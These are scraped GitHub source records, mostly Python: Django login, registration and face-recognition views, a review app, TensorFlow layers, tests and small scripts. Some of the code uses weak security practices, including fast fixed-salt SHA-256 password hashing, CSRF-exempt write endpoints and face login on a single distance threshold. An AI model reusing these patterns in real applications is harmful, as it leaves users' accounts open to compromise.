'avatar' + '/'+ fileName)\r\n# return HttpResponse('

' + request.session.get('user_name') + '

')\r\n# else:\r\n# # return redirect('/login')\r\n# return HttpResponse('

user_name为空!

')\r\n#\r\n# else:\r\n# return render(request, 'login/upload_image.html')\r\n\r\n\r\n# 用户信息\r\ndef user_info(request):\r\n if request.method == 'GET':\r\n if request.session.get('is_login', None):\r\n user = models.MyUser.objects.get(username=request.session.get('user_name'))\r\n return render(request, 'user/info.html', {'user': user, 'login_status': True, 'user_name': user.username})\r\n return redirect(\"/login/tip/您还未登录 !/\")\r\n\r\n # if request.method == 'POST':\r\n # # 获取当前登录用户才能修改信息\r\n # user = models.MyUser.objects.get(username=request.user.username)\r\n # data = request.POST\r\n # # print(request.FILES)\r\n # avatar = request.FILES.get('avatar')\r\n # # print(avatar)\r\n # username = data.get(\"username\")\r\n # email = data.get(\"email\")\r\n # phone = data.get('phone')\r\n # address = data.get('address')\r\n # cate = data.get('cate')\r\n # detail = data.get('detail')\r\n # # 判断用户修改信息时,有没有上传新图片\r\n # # 上传了换头像链接 否则不换\r\n # # 无该判断时,若用户未更换图片,则原图片链接会被赋空值,导致头像丢失\r\n # if avatar:\r\n # u.avatar = avatar\r\n # u.username = username\r\n # u.email = email\r\n # u.phone = phone\r\n # u.address = address\r\n # u.cate = cate\r\n # u.detail = detail\r\n # # 可能抛出异常:\r\n # # 如果该用户修改的昵称已存在数据库中,会报错\r\n # # 原因是,在我的设置里。用户名称是惟一的,不可重复的\r\n # # 因此,避免bug,且提供给用户弹窗警告\r\n # try:\r\n # # 如果未获取当前用户,save会新建一个没有密码的用户,操作是错误的\r\n # u.save()\r\n # except:\r\n # info = \"该用户名已被注册\"\r\n # return render(request,'Myapp/error.html', {'info':info})\r\n # # 和查看用户信息同理,每个用户都有自己的路由,修改后,重定向到新的路由\r\n # # 因为该路由由用户名决定\r\n # return HttpResponseRedirect('/profile/%s' % userinfo.username)\r\n # else:\r\n # return render(request, 'Myapp/profile_edit.html', {'userinfo':userinfo})\r\n\r\n\r\n# 求角度\r\ndef GetAngle(c1p1, c1p2, c2p1, c2p2):\r\n # 求出斜率\r\n if c1p2[0] == c1p1[0]:\r\n x = np.array([0, 1])\r\n else:\r\n k1 = (c1p2[1] - c1p1[1]) / (float(c1p2[0] - c1p1[0]))\r\n x = np.array([1, k1])\r\n if c2p2[0] == c2p1[0]:\r\n y = np.array([0, 1])\r\n else:\r\n k2 = (c2p2[1] - c2p1[1]) / (float(c2p2[0] - c2p1[0]))\r\n y = np.array([1, k2])\r\n # 模长\r\n Lx = np.sqrt(x.dot(x))\r\n Ly = np.sqrt(y.dot(y))\r\n # 根据向量之间求其夹角并保留固定小数位数\r\n Cobb = (np.arccos(x.dot(y) / (float(Lx * Ly))) * 180 / np.pi)\r\n return round(Cobb, 3)\r\n\r\n\r\n# 前后图片变化程度, True代表变化大, False代表变化小\r\n\r\ndef limbsChanges(sta, test):\r\n scope = 60\r\n flag_lst = [(11, 13), (13, 15), (12, 14), (14, 16), (24, 26), (26, 28), (23, 25), (25, 27)]\r\n for key in flag_lst:\r\n angle = GetAngle(sta[key[0]], sta[key[1]], test[key[0]], test[key[1]])\r\n # 四肢变化大 或者 人体偏移程度大\r\n if angle >= scope:\r\n return 1\r\n return 0\r\n\r\n\r\n# 计算前后图片 人体偏移程度\r\ndef bodyDeviation(sta, test):\r\n # mediapipe中坐标是已经归一化后的,可以直接进行计算\r\n sta2 = []\r\n test2 = []\r\n for i in range(0, 33):\r\n # 置信度大于0.99\r\n if sta[i][3] > 0.99 and test[i][3] > 0.99:\r\n sta2.append([sta[i][0], sta[i][1]])\r\n test2.append([test[i][0], test[i][1]])\r\n sta2 = np.array(sta2)\r\n test2 = np.array(test2)\r\n\r\n # 计算距离\r\n A = np.array([sta2[:, 0].mean(), sta2[:, 1].mean()])\r\n B = np.array([test2[:, 0].mean(), test2[:, 1].mean()])\r\n dist = np.sqrt(sum(np.power((A - B), 2)))\r\n\r\n # 距离范围\r\n if dist > 0.3:\r\n return 1\r\n return 0\r\n\r\n\r\n# 站姿正 得分\r\ndef poseScore(sta, test):\r\n scope = 20\r\n score = 0\r\n score_lst = [11, 12, 23, 24, 27, 28]\r\n for key in score_lst:\r\n angle = GetAngle(sta[key], sta[0], test[key], test[0])\r\n if abs(angle - scope) > scope:\r\n score += 0\r\n else:\r\n score += abs(angle - scope) / scope\r\n\r\n total_score = score / len(score_lst) * 100\r\n return round(total_score, 2)\r\n\r\n\r\n# 上传 人脸图片\r\ndef face_upload(request):\r\n if request.session.get('is_login', None):\r\n if request.method == 'GET':\r\n user_name = request.session.get('user_name')\r\n return render(request, 'face/upload.html', {'login_status': True, 'user_name': user_name, 'page': 'upload'})\r\n\r\n if request.method == 'POST':\r\n user = models.MyUser.objects.get(username=request.session.get('user_name'))\r\n dirFace = os.path.join(settings.MEDIA_ROOT, 'face', user.id).replace('\\\\', '/')\r\n imgs = request.FILES.getlist('face')\r\n\r\n if os.path.isdir(dirFace):\r\n # 如果目标路径存在原文件夹的话就先删除\r\n shutil.rmtree(dirFace)\r\n\r\n os.makedirs(dirFace)\r\n\r\n for img in imgs:\r\n # 后缀名\r\n # fileName = str(uuid.uuid4()).replace('-', '') + '.' + img.name.split('.')[-1]\r\n file_name = str(uuid.uuid4()).replace('-', '') + '.png'\r\n filePath = os.path.join(dirFace, file_name).replace('\\\\', '/')\r\n with open(filePath, 'wb+') as f:\r\n for chunk in img.chunks():\r\n f.write(chunk)\r\n\r\n if os.path.exists('./media/face/representations_vgg_face.pkl'):\r\n os.remove('./media/face/representations_vgg_face.pkl')\r\n findDb.findDb(db_path='./media/face', enforce_detection=False, distance_metric='euclidean')\r\n\r\n ret = {'status': True}\r\n return JsonResponse(ret)\r\n\r\n else:\r\n return redirect(\"/login/tip/您还未登录 !/\")\r\n # return redirect('/login')\r\n\r\n\r\n# 人脸登录\r\ndef face_login(request):\r\n if request.session.get('is_login', None):\r\n return redirect(\"/index/tip/您已登录 !/\")\r\n\r\n else:\r\n if request.method == 'GET':\r\n return render(request, 'face/face_login.html', {'page': 'login'})\r\n\r\n if request.method == 'POST':\r\n dr = os.path.join(settings.MEDIA_ROOT, 'temp').replace('\\\\', '/')\r\n model_name = ['VGG-Face', 'Facenet', 'OpenFace', 'DeepFace', 'DeepID', 'Dlib', 'Ensemble']\r\n img = request.FILES.get('face')\r\n fileName = str(uuid.uuid4()).replace('-', '') + '.png'\r\n filePath = os.path.join(dr, fileName).replace('\\\\', '/')\r\n with open(filePath, 'wb+') as f:\r\n for chunk in img.chunks():\r\n f.write(chunk)\r\n df = DeepFace.find(img_path=filePath, model_name=model_name[0], db_path='./media/face',\r\n enforce_detection=False, distance_metric='euclidean')\r\n\r\n os.remove(filePath)\r\n\r\n if df.iloc[0]['VGG-Face_euclidean'] < 0.35:\r\n uid = df.iloc[0]['identity'].replace('\\\\', '/').split('/')[-2]\r\n if models.MyUser.objects.get(id=uid):\r\n user = models.MyUser.objects.get(id=uid)\r\n request.session['is_login'] = True\r\n request.session['user_id'] = user.id\r\n request.session['user_name'] = user.username\r\n request.session['status_flag'] = user.status_flag\r\n\r\n ret = {'state': True, 'user_name': str(user.username)}\r\n return JsonResponse(ret)\r\n\r\n else:\r\n ret = {'state': False}\r\n return JsonResponse(ret)\r\n\r\n else:\r\n ret = {'state': False}\r\n return JsonResponse(ret)\r\n\r\n\r\n# 登录 邮箱、用户名、密码、验证码\r\ndef login(request):\r\n if request.session.get('is_login', None):\r\n return redirect(\"/index/tip/您已登录/\")\r\n\r\n elif request.method == \"GET\":\r\n print(request.session.get('is_login'))\r\n register_form = RegisterForm()\r\n login_form = LoginForm()\r\n login_message = \"\"\r\n return render(request, 'login/login.html',\r\n {'login': True, 'login_form': login_form, 'register_form': register_form,\r\n 'login_message': login_message})\r\n\r\n elif request.method == \"POST\":\r\n register_form = RegisterForm()\r\n login_form = LoginForm(request.POST)\r\n login_message = \"表单验证失败\"\r\n if login_form.is_valid():\r\n username = login_form.cleaned_data['username']\r\n password = login_form.cleaned_data['password']\r\n flag = login_form.cleaned_data['flag']\r\n\r\n if models.MyUser.objects.filter(username=username).exists():\r\n user = models.MyUser.objects.get(username=username)\r\n\r\n if user.status_flag == flag:\r\n if user.password == hash_code(password):\r\n request.session['is_login'] = True\r\n request.session['user_id'] = user.id\r\n request.session['user_name'] = user.username\r\n request.session['status_flag'] = user.status_flag\r\n\r\n # 普通用户\r\n if user.status_flag == '0':\r\n return redirect(\"/index/\")\r\n # 裁判\r\n elif user.status_flag == '1':\r\n return redirect(\"/judge/video/\")\r\n # 管理员\r\n elif user.status_flag == '2':\r\n return redirect(\"/Administrator/secure/index\")\r\n # /Administrator/secure/index\r\n\r\n else:\r\n login_message = \"密码不正确\"\r\n else:\r\n login_message = \"请选择正确的用户身份\"\r\n else:\r\n login_message = \"用户不存在\"\r\n # return render(request, 'login/login.html', locals())\r\n return render(request, 'login/login.html',\r\n {'login': True, 'login_form': login_form, 'register_form': register_form,\r\n 'login_message': login_message})\r\n\r\n\r\n# 登录 提示\r\ndef login_tip(request, tip):\r\n if request.method == \"GET\":\r\n register_form = RegisterForm()\r\n login_form = LoginForm()\r\n return render(request, 'login/login.html',\r\n {'login': True, 'login_form': login_form, 'register_form': register_form,\r\n 'login_message': None, 'tip': tip})\r\n\r\n\r\n# 注册 邮箱、用户名、密码、验证码\r\ndef register(request):\r\n if request.session.get('is_login', None):\r\n return redirect(\"/index/tip/您已登录/\")\r\n\r\n elif request.method == \"GET\":\r\n register_form = RegisterForm()\r\n login_form = LoginForm()\r\n login_message = \"\"\r\n return render(request, 'login/login.html',\r\n {'login': False, 'login_form': login_form, 'register_form': register_form,\r\n 'login_message': login_message})\r\n\r\n elif request.method == \"POST\":\r\n login_form = LoginForm()\r\n register_form = RegisterForm(request.POST)\r\n register_message = \"表单验证失败\"\r\n if register_form.is_valid():\r\n email = register_form.cleaned_data['email']\r\n username = register_form.cleaned_data['username']\r\n password = register_form.cleaned_data['password']\r\n password2 = register_form.cleaned_data['password2']\r\n if password != password2:\r\n register_message = '两次密码不一样'\r\n return render(request, 'login/login.html',\r\n {'login': False, 'register_form': register_form, 'login_form': login_form,\r\n 'register_message': register_message})\r\n\r\n elif models.MyUser.objects.filter(email=email).exists():\r\n register_message = '邮箱已注册'\r\n return render(request, 'login/login.html',\r\n {'login': False, 'register_form': register_form, 'login_form': login_form,\r\n 'register_message': register_message})\r\n\r\n elif models.MyUser.objects.filter(username=username).exists():\r\n register_message = '用户名已注册'\r\n return render(request, 'login/login.html',\r\n {'login': False, 'register_form': register_form, 'login_form': login_form,\r\n 'register_message': register_message})\r\n else:\r\n user = models.MyUser.objects.create(username=username, email=email, password=hash_code(password))\r\n user.save()\r\n request.session['is_login'] = True\r\n request.session['user_id'] = user.id\r\n request.session['user_name'] = user.username\r\n # return redirect(\"/index\", login_status=True)\r\n return redirect(\"/index/\")\r\n # return render(request, \"index.html\", {'login_status': True, 'user_name': str(user.username)})\r\n\r\n return render(request, 'login/login.html',\r\n {'login': False, 'register_form': register_form, 'login_form': login_form,\r\n 'register_message': register_message})\r\n\r\n\r\n# 注销\r\ndef logout(request):\r\n if not request.session.get('is_login', None):\r\n return redirect(\"/login/tip/您还未登录 !\")\r\n\r\n request.session.flush()\r\n return redirect(\"/login\")\r\n\r\n\r\n# 字符串+哈希\r\ndef hash_code(s, salt='speech_ai'): # 加点盐\r\n h = hashlib.sha256()\r\n s += salt\r\n h.update(s.encode()) # update方法只接收bytes类型\r\n return h.hexdigest()\r\n\r\n\r\n# 返回登录注册页面\r\ndef login_register(request):\r\n if request.session.get('is_login', None):\r\n return redirect(\"/index/tip/您已登录/\")\r\n\r\n elif request.method == \"GET\":\r\n login_form = LoginForm()\r\n register_form = RegisterForm()\r\n return render(request, 'login/login.html',\r\n {'login': True, 'login_form': login_form, 'register_form': register_form})\r\n\r\n\r\n# 返回 404 页面\r\ndef page_not_found(request, exception):\r\n return render(request, '404.html')\r\n\r\n# 500\r\n# def page_error(request, exception):\r\n# return render(request, '404.html')\r\n","repo_name":"1933211129/speech","sub_path":"speech_ai/login/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":48892,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"17482800225","text":"from django.core.urlresolvers import reverse\nfrom django.test.client import RequestFactory\n\nfrom nose.tools import eq_, ok_\n\nfrom mkt.site.tests import app_factory, TestCase\nfrom mkt.versions.models import Version\nfrom mkt.versions.serializers import VersionSerializer\n\n\nclass TestVersionSerializer(TestCase):\n def setUp(self):\n self.app = app_factory()\n self.features = self.app.current_version.features\n self.request = RequestFactory().get('/')\n self.serializer = VersionSerializer(context={'request': self.request})\n\n def native(self, obj=None, **kwargs):\n if not obj:\n obj = self.app.current_version\n obj.update(**kwargs)\n return self.serializer.to_representation(obj)\n\n def test_renamed_fields(self):\n native = self.native()\n removed_keys = self.serializer.Meta.field_rename.keys()\n added_keys = self.serializer.Meta.field_rename.values()\n ok_(all(k not in native for k in removed_keys))\n ok_(all(k in native for k in added_keys))\n\n def test_addon(self):\n eq_(self.native()['app'], reverse('app-detail',\n kwargs={'pk': self.app.pk}))\n\n def test_is_current_version(self):\n old_version = Version.objects.create(addon=self.app, version='0.1')\n ok_(self.native()['is_current_version'])\n ok_(not self.native(obj=old_version)['is_current_version'])\n\n def test_features(self, **kwargs):\n if kwargs:\n self.features.update(**kwargs)\n native = self.native()\n for key in dir(self.features):\n if key.startswith('has_') and getattr(self.features, key):\n ok_(key.replace('has_', '') in native['features'])\n\n def test_features_updated(self):\n self.test_features(has_fm=True)\n","repo_name":"mozilla/zamboni","sub_path":"mkt/versions/tests/test_serializers.py","file_name":"test_serializers.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","stars":476,"dataset":"github-code","pt":"3"} +{"seq_id":"69959452882","text":"def add(a, b):\n return a + b\n\n\n\"\"\"\nMCNN layer defination using tensorflow\n\n1. conv: convolutional layer\n2. pool: pooling layer\n3. loss: loss layer to compute the mean square\n\"\"\"\n\n# import tensorflow and numpy\nimport tensorflow as tf\nimport numpy as np\n\n\ndef conv(input_tensor, name, kernel_size, n_output, stride=1, activation=tf.nn.relu):\n \"\"\"\n Convolutional layer:\n :param input_tensor: Input tensor (feature map/image)\n :param name: name of this convolutional layer\n :param kernel size: size of a square filter matrix\n :param n_out: number of output feature maps\n :param stride: stride value, default = 1\n :param activation_fn: nonlinear activation fucntion, default is relu\n :return: output feature map after activation\n \"\"\"\n\n n_in = input_tensor.get_shape()[-1].value\n with tf.variable_scope(name):\n weights = tf.Variable(\n tf.truncated_normal(\n shape=(kernel_size, kernel_size, n_in, n_output), stddev=0.01\n ),\n dtype=tf.float32,\n name=\"weights\",\n )\n biases = tf.Variable(\n tf.constant(0.0, shape=[n_output]), dtype=tf.float32, name=\"biases\"\n )\n conv = tf.nn.conv2d(\n input_tensor, weights, (1, stride, stride, 1), padding=\"SAME\"\n )\n activation = activation(tf.nn.bias_add(conv, biases))\n tf.summary.histogram(\"weights\", weights)\n return activation\n\n\ndef pool(input_tensor, name, kernel_size, stride):\n \"\"\"\n Max Pooling layer\n :param input_tensor: input tensor (feature map) to the pooling layer\n :param name: name of the layer\n :param kernel_size: scale down size \n :param stride: stride across size,\n :return: output tensor (feature map) with reduced feature size (Scaled down by 2).\n \"\"\"\n return tf.nn.max_pool(\n input_tensor,\n ksize=[1, kernel_size, kernel_size, 1],\n strides=[1, stride, stride, 1],\n padding=\"SAME\",\n name=name,\n )\n\n\ndef loss(estimate, grouth_truth):\n \"\"\"\n Computes mean square error between the network estimated density map and the ground truth density map.\n :param est: Estimated density map\n :param gt: Ground truth density map\n :return: scalar loss after doing pixel wise mean square error.\n \"\"\"\n return tf.losses.mean_squared_error(estimate, grouth_truth)\n\n\ndef test_loss_layer():\n if __name__ == \"__main__\":\n x = tf.placeholder(tf.float32, [1, 20, 20, 1])\n y = tf.placeholder(tf.float32, [1, 20, 20, 1])\n mse = loss(x, y)\n sess = tf.Session()\n dict = {\n x: 5 * np.ones(shape=(1, 20, 20, 1)),\n y: 1 * np.ones(shape=(1, 20, 20, 1)),\n }\n loss_value = sess.run(mse, feed_dict=dict)\n print('x size: {}'.format(x.shape))\n x = 5 * np.ones(shape=(20, 20))\n y = 1 * np.ones(shape=(20, 20))\n mae = abs(x-y)\n print(\"MSE: {:.2f}\".format(mae))\n print(\"sum x: {}, sum y: {}\".format(np.sum(x), np.sum(y)))\n sess.close()\n\ntest_loss_layer()\n","repo_name":"delvk/python_practice","sub_path":"src/layer.py","file_name":"layer.py","file_ext":"py","file_size_in_byte":3050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3120293133","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport argparse\nimport logging\n\nfrom extractor.extractor_loader import ExtractorLoader\nfrom helper.hutils import import_class\n\nlogging.getLogger().setLevel(logging.INFO)\n\n\ndef main(settings):\n assert settings['feature_set'] is not None\n\n # Load feature set\n logging.info('loading feature set {}'.format(settings['feature_set']))\n extractor = ExtractorLoader()\n extractor.load(settings)\n\n # Load associated course\n extractor_settings = extractor.get_settings()\n logging.info('loading course data from {} {} {}'.format(extractor_settings['course_id'], extractor_settings['type'],\n extractor_settings['platform']))\n\n # Arrange data\n logging.info('arranging data from {}'.format(extractor_settings['course_id']))\n feature_labels = extractor.get_features_values()[0][settings['target']].values\n feature_values = extractor.get_features_values()[1]\n\n X = feature_values\n y = feature_labels if settings['target_type'] == 'regression' else feature_labels.astype(int)\n\n logging.info(X.shape)\n logging.info(y.shape)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Load features')\n\n parser.add_argument('--feature_set', dest='feature_set',\n default='eq_week-akpinar_et_al-toy_course_20210202_000840-20210202_134548', type=str,\n action='store') # Find the folder in data/result/test/feature\n parser.add_argument('--target', dest='target', default='label-pass-fail', type=str, action='store')\n parser.add_argument('--target_type', dest='target_type', default='classification', type=str, action='store')\n parser.add_argument('--classes', dest='classes', default=1, type=int, action='store')\n parser.add_argument('--workdir', dest='workdir', default='../data/result/test/', type=str, action='store')\n\n settings = vars(parser.parse_args())\n\n main(settings)\n","repo_name":"epfl-ml4ed/flipped-classroom","sub_path":"test/test_toy_extractor_loader.py","file_name":"test_toy_extractor_loader.py","file_ext":"py","file_size_in_byte":1994,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"3"} +{"seq_id":"14637659851","text":"from utils import *\nimport re\nimport copy\nfrom functools import *\nfrom collections import *\n\ndef main():\n # Load all lines\n lines = getlines()\n fields = {}\n i = 0\n while True:\n l = lines[i].split(':')\n k = l[0]\n if len(l) != 2:\n break\n v = l[1].strip().split(' or ')\n v = list(map(lambda x: x.split('-'), v))\n v = [ list(map(int, j)) for j in v ]\n fields[k] = v\n i += 1\n i += 2\n y_t = list(map(int, lines[i].split(',')))\n i += 3\n tikz = []\n newtikz = []\n while i < len(lines):\n l = lines[i]\n tikz.append(list(map(int, l.split(','))))\n i += 1\n ninvalid = 0\n for t in tikz:\n is_valid = True\n for q in t:\n valid = False\n for k, v in fields.items():\n for r in v:\n a = r[0]\n b = r[1]\n if a <= q <= b:\n valid = True\n if not valid:\n is_valid = False\n break\n if not is_valid:\n continue\n newtikz.append(t)\n possible = []\n for i in range(len(y_t)):\n c = set()\n for k in fields:\n c.add(k)\n possible.append(c)\n for t in newtikz:\n for i in range(len(t)):\n q = t[i]\n for k, v in fields.items():\n valid = False\n for r in v:\n a = r[0]\n b = r[1]\n if a <= q <= b:\n valid = True\n if not valid and k in possible[i]:\n possible[i].remove(k)\n\n while True:\n counts = defaultdict(int)\n for i in range(len(possible)):\n for k in possible[i]:\n counts[k] += 1\n for k, v in counts.items():\n if v == 1:\n for i in range(len(possible)):\n for k2 in list(possible[i]):\n if k2 != k and k in possible[i]:\n possible[i].remove(k2)\n can_end = True\n for k in possible:\n if len(k) != 1:\n can_end = False\n if can_end:\n break\n\n maps = {}\n for i in range(len(possible)):\n for k in possible[i]:\n maps[k] = i\n p(maps)\n t = 1\n for k, i in maps.items():\n if k.startswith('departure'):\n t *= y_t[i]\n p(t)\n\n \nif __name__ == '__main__':\n main()\n","repo_name":"stephen-hansen/Advent2020","sub_path":"16/p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"9831275542","text":"import datetime\nimport json\nfrom django.shortcuts import render, redirect\nfrom django.http import JsonResponse, HttpResponseRedirect, HttpResponse, HttpResponseNotFound\n\nfrom Homepage.models import Book\nfrom .models import Review\nfrom .forms import ReviewForm\nfrom django.urls import reverse\nfrom django.views.decorators.csrf import csrf_exempt\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.decorators import user_passes_test\nfrom django.core import serializers\nfrom django.contrib.auth.decorators import login_required\nfrom Homepage.models import Book,ImageUrl\nfrom django.contrib.auth.models import User\n\n\n# Create your views here.\n\ndef home(request):\n return render(request, \"home.html\")\n\n@csrf_exempt\ndef get_review_json(request,id):\n book = Book.objects.get(id=id)\n reviews = Review.objects.prefetch_related('photo').select_related('user__auth_user').filter(book=book)\n review_list = []\n \n for review in reviews:\n print(photo.url for photo in review.photo.all())\n review_data = {\n 'user': review.user.auth_user.to_dict() if review.user else None,\n 'rating': review.rating,\n 'content': review.content,\n 'created_at':review.date_added,\n 'review':review.to_dict(),\n 'photos': [photo.url for photo in review.photo.all()]\n }\n review_list.append(review_data)\n\n return JsonResponse({'reviews': review_list})\n\n@login_required(login_url='/login/')\ndef show_review(request):\n form = ReviewForm(request.POST or None)\n if request.method == 'POST' and form.is_valid():\n create_review(request)\n return HttpResponseRedirect(reverse('ReviewApp:show_review'))\n bookId = 1\n print(\"==============KINGDOM BOOK==============\")\n print(bookId)\n reviews = Review.objects.all()\n context = {\n 'name' : request.user.username,\n 'reviews' : reviews,\n 'form': form,\n }\n return render(request, 'review.html', context)\n\n# def create_review(request):\n# if request.method == 'POST':\n# form = ReviewForm(request.POST or None)\n# if form.is_valid() and request.method == \"POST\":\n# review = form.save(commit=False)\n# review.user = request.user\n# review.save()\n# return HttpResponseRedirect(reverse('ReviewApp:show_review'))\n# else:\n# form = ReviewForm()\n# context = {'form': form }\n# return render(request, \"book_detail.html\", context)\n\n@csrf_exempt\ndef create_review(request):\n data = json.loads(request.body)\n user = User.objects.get(pk=int(data['userId'])) if data['userId'] else None\n print(user) \n print(data)\n print('konten->',data['content'])\n book = Book.objects.prefetch_related('authors', 'images', 'categories').get(pk=int(data['bookId']))\n print(book)\n if request.method == 'POST':\n try:\n print('sini lah susah bgt')\n new_comment = Review(user=user,rating=int(data['rating']),book=book,content=data['content'])\n print('kemari woi')\n new_comment.save()\n print(new_comment)\n print('nah okee')\n urls = []\n for url in data['photo']:\n photourl, created = ImageUrl.objects.get_or_create(url=url)\n urls.append(photourl)\n new_comment.photo.add(*urls)\n return JsonResponse({'status':201})\n except Exception as e:\n print(e)\n return JsonResponse({'status':500})\n \n return HttpResponseNotFound()","repo_name":"isaui/my-actual-bookphoria","sub_path":"ReviewApp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6492078927","text":"# Copyright (c) 2020 safexl\r\nimport unittest\r\nimport tempfile\r\nimport pythoncom\r\nimport pywintypes\r\nimport win32com.client\r\nimport safexl\r\n\r\n\r\nclass test_is_excel_open(unittest.TestCase):\r\n def test_when_excel_is_open(self):\r\n pythoncom.CoInitialize()\r\n application = win32com.client.Dispatch(\"Excel.Application\")\r\n self.assertTrue(safexl.is_excel_open())\r\n safexl.kill_all_instances_of_excel(application)\r\n del application\r\n pythoncom.CoUninitialize()\r\n\r\n def test_when_excel_is_not_open(self):\r\n safexl.kill_all_instances_of_excel()\r\n self.assertFalse(safexl.is_excel_open())\r\n\r\n\r\nclass test_excel_open_files(unittest.TestCase):\r\n @staticmethod\r\n def count_tempfiles():\r\n return sum(1 for file in safexl.toolkit.excel_open_files() if file.endswith(\".tmp\"))\r\n\r\n def test_that_results_update_immediately(self):\r\n safexl.kill_all_instances_of_excel()\r\n self.assertFalse(safexl.is_excel_open())\r\n\r\n pythoncom.CoInitialize()\r\n application = win32com.client.Dispatch(\"Excel.Application\")\r\n\r\n # no workbooks have been added yet\r\n open_files_1 = self.count_tempfiles()\r\n self.assertEqual(0, open_files_1)\r\n\r\n # 1 workbook added, 1 more .tmp file than before\r\n wb1 = application.Workbooks.Add()\r\n open_files_2 = self.count_tempfiles()\r\n self.assertEqual(1, open_files_2)\r\n self.assertEqual(open_files_1 + 1, open_files_2)\r\n\r\n # 2 workbooks added, 1 more .tmp file than before\r\n wb2 = application.Workbooks.Add()\r\n open_files_3 = self.count_tempfiles()\r\n self.assertEqual(2, open_files_3)\r\n self.assertEqual(open_files_2 + 1, open_files_3)\r\n\r\n # 1 workbook removed, 1 less .tmp file than before\r\n application.DisplayAlerts = False\r\n wb2.Close(SaveChanges=False)\r\n application.DisplayAlerts = True\r\n open_files_4 = self.count_tempfiles()\r\n self.assertEqual(1, open_files_4)\r\n self.assertEqual(open_files_3 - 1, open_files_4)\r\n\r\n # 2 workbooks removed, 1 less .tmp file than before, back to beginning\r\n application.DisplayAlerts = False\r\n wb1.Close(SaveChanges=False)\r\n application.DisplayAlerts = True\r\n open_files_5 = self.count_tempfiles()\r\n self.assertEqual(0, open_files_5)\r\n self.assertEqual(open_files_4 - 1, open_files_5)\r\n self.assertEqual(open_files_5, open_files_1)\r\n\r\n safexl.kill_all_instances_of_excel(application)\r\n del application\r\n pythoncom.CoUninitialize()\r\n\r\n def test_that_newly_saved_file_is_picked_up_and_lost_when_closed(self):\r\n pythoncom.CoInitialize()\r\n application = win32com.client.Dispatch(\"Excel.Application\")\r\n\r\n wb1 = application.Workbooks.Add()\r\n with tempfile.TemporaryDirectory() as temp_dir:\r\n save_filepath = f\"{temp_dir}\\\\temporary.xlsx\"\r\n application.DisplayAlerts = False\r\n wb1.SaveAs(save_filepath)\r\n\r\n self.assertIn(save_filepath, safexl.toolkit.excel_open_files())\r\n wb1.Close()\r\n self.assertNotIn(save_filepath, safexl.toolkit.excel_open_files())\r\n\r\n application.DisplayAlerts = True\r\n\r\n safexl.kill_all_instances_of_excel(application)\r\n del application\r\n pythoncom.CoUninitialize()\r\n\r\n\r\nclass test_kill_all_instances_of_excel(unittest.TestCase):\r\n def test_can_kill_excel_instance(self):\r\n pythoncom.CoInitialize()\r\n application = win32com.client.Dispatch(\"Excel.Application\")\r\n\r\n self.assertEqual(\"Microsoft Excel\", application.Name)\r\n safexl.kill_all_instances_of_excel()\r\n with self.assertRaises(pywintypes.com_error):\r\n app_name = application.Name\r\n\r\n del application\r\n pythoncom.CoUninitialize()\r\n\r\n def test_can_kill_excel_instance_when_passed_app(self):\r\n pythoncom.CoInitialize()\r\n application = win32com.client.Dispatch(\"Excel.Application\")\r\n\r\n self.assertEqual(\"Microsoft Excel\", application.Name)\r\n safexl.kill_all_instances_of_excel(application)\r\n with self.assertRaises(pywintypes.com_error):\r\n app_name = application.Name\r\n\r\n del application\r\n pythoncom.CoUninitialize()\r\n\r\n def test_can_kill_multiple_excel_instances(self):\r\n pythoncom.CoInitialize()\r\n\r\n # Using DispatchEx specifically here to create multiple instances of Excel open at once\r\n application1 = win32com.client.DispatchEx(\"Excel.Application\")\r\n application2 = win32com.client.DispatchEx(\"Excel.Application\")\r\n application3 = win32com.client.DispatchEx(\"Excel.Application\")\r\n\r\n self.assertEqual(\"Microsoft Excel\", application1.Name)\r\n self.assertEqual(\"Microsoft Excel\", application2.Name)\r\n self.assertEqual(\"Microsoft Excel\", application3.Name)\r\n\r\n safexl.kill_all_instances_of_excel()\r\n\r\n with self.assertRaises(pywintypes.com_error):\r\n app_name = application1.Name\r\n with self.assertRaises(pywintypes.com_error):\r\n app_name = application2.Name\r\n with self.assertRaises(pywintypes.com_error):\r\n app_name = application3.Name\r\n\r\n del application1\r\n del application2\r\n del application3\r\n pythoncom.CoUninitialize()\r\n","repo_name":"ThePoetCoder/safexl","sub_path":"safexl/tests/test_psutil_wrappers.py","file_name":"test_psutil_wrappers.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"3"} +{"seq_id":"35308714683","text":"import customtkinter\nfrom tksheet import Sheet\n\n\nclass CalenderWindow(customtkinter.CTkFrame):\n\tdef __init__(self, master, view, default_year):\n\t\tsuper().__init__(master)\n\n\t\tself.view = view\n\n\t\tself.setup_widgets()\n\t\tself.year_combo.set(default_year)\n\t\tself.configure_grid()\n\n\tdef configure_grid(self):\n\t\tself.grid_columnconfigure(1, weight=1)\n\t\tself.grid_rowconfigure(3, weight=1)\t\t\n\n\tdef setup_widgets(self):\n\t\tcustomtkinter.CTkLabel(self, text=\"CALENDAR\", font=self.view.page_title_font).grid(row=0,\n\t\t\t\t\t\t\t\t\t\t column=0, padx=self.view.padx*3, pady=self.view.pady, sticky=\"NW\")\n\n\t\tself.year_combo = customtkinter.CTkComboBox(self, command=self.combobox_callback)\n\t\tself.year_combo.grid(row=2, column=0, padx=self.view.padx, pady=self.view.pady, sticky=\"NSEW\")\n\n\t\tself.calender_sheet = self.view.setup_tksheet_table(self, [\"Week\", \"Race\", \"Circuit\", \"City\", \"Country\", \"Winner\"])\n\t\tself.calender_sheet.grid(row=3, column=0, columnspan=2, padx=self.view.padx, 